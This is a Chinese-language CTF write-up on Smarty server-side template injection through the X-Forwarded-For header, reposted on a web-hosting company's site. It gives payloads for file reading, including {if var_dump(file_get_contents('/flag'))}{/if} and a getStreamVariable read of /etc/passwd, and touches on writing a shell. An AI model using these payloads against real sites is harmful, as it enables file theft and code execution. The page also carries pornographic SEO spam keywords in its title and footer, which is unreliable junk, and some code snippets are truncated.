老熟女激烈的高潮_日韩一级黄色录像_亚洲1区2区3区视频_精品少妇一区二区三区在线播放_国产欧美日产久久_午夜福利精品导航凹凸

重慶分公司,新征程啟航

為企業提供網站建設、域名注冊、服務器等服務

SmartySSTi怎么用

本篇內容介紹了“Smarty SSTi怎么用”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!

創新互聯公司-專業網站定制、快速模板網站建設、高性價比扎賚特網站開發、企業建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式扎賚特網站制作公司更省心,省錢,快速模板網站建設找我們,業務覆蓋扎賚特地區。費用合理售后完善,十多年實體公司更值得信賴。

題目描述

題目提供了一個讀取XFF頭的api ,頁面最下方有Build With Smarty的字樣,可以確定是用Smarty引擎寫的.

基本上可以確定該頁面存在SSTi的可能性

Smarty SSTi怎么用

將xff頭從127.0.0.1改為127.0.0{1+2}出現如下結果

ssti無疑了

Smarty SSTi怎么用

最終payload是

X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if}

Smarty SSTi怎么用

Smarty SSTI 利用

Smarty是基于PHP開發的,對于Smarty的SSTI的利用手段與常見的flask的SSTI有很大區別。

漏洞確認

一般情況下輸入{$smarty.version}就可以看到返回的smarty的版本號。該題目的Smarty版本是3.1.30

Smarty SSTi怎么用

常規利用方式

Smarty支持使用{php}{/php}標簽來執行被包裹其中的php指令,最常規的思路自然是先測試該標簽。但就該題目而言,使用{php}{/php}標簽會報錯:

Smarty SSTi怎么用

在Smarty3的官方手冊里有以下描述:

Smarty已經廢棄{php}標簽,強烈建議不要使用。在Smarty 3.1,{php}僅在SmartyBC中可用。

該題目使用的是Smarty類,所以只能另尋它路。

{literal}標簽

官方手冊這樣描述這個標簽:

{literal}可以讓一個模板區域的字符原樣輸出。這經常用于保護頁面上的Javascript或css樣式表,避免因為Smarty的定界符而錯被解析。

那么對于php5的環境我們就可以使用

phpinfo();

來實現PHP代碼的執行,但這道題的題目環境是PHP7,這種方法就失效了。

靜態方法

通過self獲取Smarty類再調用其靜態方法實現文件讀寫被網上很多文章采用。

Smarty類的getStreamVariable方法的代碼如下:

public function getStreamVariable($variable)
{
       $_result = '';
       $fp = fopen($variable, 'r+');
       if ($fp) {
           while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
               $_result .= $current_line;
          }
           fclose($fp);
           return $_result;
      }
       $smarty = isset($this->smarty) ? $this->smarty : $this;
       if ($smarty->error_unassigned) {
           throw new SmartyException('Undefined stream variable "' . $variable . '"');
      } else {
           return null;
      }
  }

可以看到這個方法可以讀取一個文件并返回其內容,所以我們可以用self來獲取Smarty對象并調用這個方法,很多文章里給的payload都形如:{self::getStreamVariable("file:///etc/passwd")}。然而使用這個payload會觸發報錯如下:

Fatal error: Uncaught --> Smarty Compiler: Syntax error in template "string:Current IP:{self::getStreamVariable(‘file:///etc/passwd’)}" static class 'self' is undefined or not allowed by security setting <-- thrown in /var/www/html/smarty/libs/sysplugins/smarty_internal_templatecompilerbase.phpon line 12

可見這個舊版本Smarty的SSTI利用方式并不適用于新版本的Smarty。而且在3.1.30的Smarty版本中官方已經把該靜態方法刪除。對于那些文章提到的利用 Smarty_Internal_Write_File 類的writeFile方法來寫shell也由于同樣的原因無法使用。

{if}標簽

官方文檔中看到這樣的描述:

Smarty的{if}條件判斷和PHP的if 非常相似,只是增加了一些特性。每個{if}必須有一個配對的{/if}. 也可以使用{else}{elseif}. 全部的PHP條件表達式和函數都可以在if內使用,如||, or, &&, and, is_array(), 等等

既然全部的PHP函數都可以使用,那么我們是否可以利用此來執行我們的代碼呢?

正如開頭所說的

題目漏洞代碼

通過getshell之后的文件讀取,本題中引發SSTI的代碼簡化后如下:

display("string:".$ip);
}

可以看到這里使用字符串代替smarty模板,導致了注入的Smarty標簽被直接解析執行,產生了SSTI。

“Smarty SSTi怎么用”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注創新互聯網站,小編將為大家輸出更多高質量的實用文章!


分享名稱:SmartySSTi怎么用
URL地址:http://www.xueling.net.cn/article/jpspoo.html

其他資訊

在線咨詢
服務熱線
服務熱線:028-86922220
TOP
主站蜘蛛池模板: 日韩高清三区 | 久久人视频 | 绯色一区二区二区av免费 | 久久影院在线观看 | 天天天操天天天干 | 狠狼鲁亚洲综合在线 | 国产一区二区三区中文 | caoporen个人免费公开 | 麻豆aⅴ精品无码一区二区 亚洲大尺度专区无码浪潮AV | 91大神夯51部在线观看 | 狠狠色狠狠色狠狠五月 | 欧美激情精品久久久久久不卡 | 一区二区三区日韩精品 | WWW插插插无码免费视频网站 | 国产精品久久久久久久久久红粉 | 国产色情强伦免费视频 | 亚洲欧美乱综合图片区小说区 | 91久久久久久久久久久久久久 | 美国毛片基地 | 日本美女黄网站 | 午夜aaa | 麻豆影视在线免费观看 | 91无遮挡无码国产在线播放 | 视频一区视频二区视频三区高 | 亚洲另类激情网站 | 成人羞羞国产免费动态 | 久久97精品久久久久久 | a级a做爰片免费观看 | 亚洲午夜无码毛片av久久 | 亚洲国产精品久久久久婷婷老年 | 俄罗斯ZOOM与人性ZOOM | 懂爱av| 国产一级免费看视频欧美激情 | 99热99| 久久精品无套 | 国产精品av久久久久久无 | 免费国产a国产片高清不卡 欧美激欧美啪啪片 | 日本高清视频WWW夜色资源 | 亚洲激情四射视频中文字幕久久 | 强行糟蹋人妻HD中文 | 久久性网站 |